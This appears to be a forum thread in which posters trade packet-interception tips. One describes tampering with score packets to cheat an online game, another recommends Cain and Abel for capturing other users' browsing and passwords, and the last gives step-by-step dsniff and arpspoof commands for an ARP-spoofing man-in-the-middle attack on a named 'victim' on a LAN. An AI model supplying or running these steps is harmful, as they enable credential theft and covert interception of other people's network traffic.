Dude, intercepting your own packets is NOT hacking. Should you be able to break into someones network and THEN intercept those, that'd be cool. Btw, what distro is that?

As a matter of fact, I do. For easy hacking, I'd recommend the Tamper Data extension for firefox. This will intercept every package sent with firefox, and allows you to modify it. I used this to kinda cheat on a game: I intercepted the packages which contained my score, then I modified them, and then I passed them on to the original receipient (the stats server). Too bad that game uses MD5 package verification now, otherwise I'd still be the king.

use cain and abel, it intercepts traffic from other people in the network, its better on wireless. it shows you the url they are browsing, username and password. it also has come password crackers and that.

1. Get dsniff or some other good sniffer(I would recommend dsniff, since it comes with arp script)

2. Get a IP address and your gateaway address on your lan(this thing will only work on a lan)

3. run echo 1 >> /proc/sys/net/ipv4/ip_forward , so that your victim doesnt get his net disconnected***

4. dsniff -d 'ip host xxx.xxx.xxx.xxx' insert the victims ip in the x fields

5. run the arp script: arpspoof -t vitims_ip gateaway_ip

**you can only sniff on unenrypted protocols, such as ftp, etc..
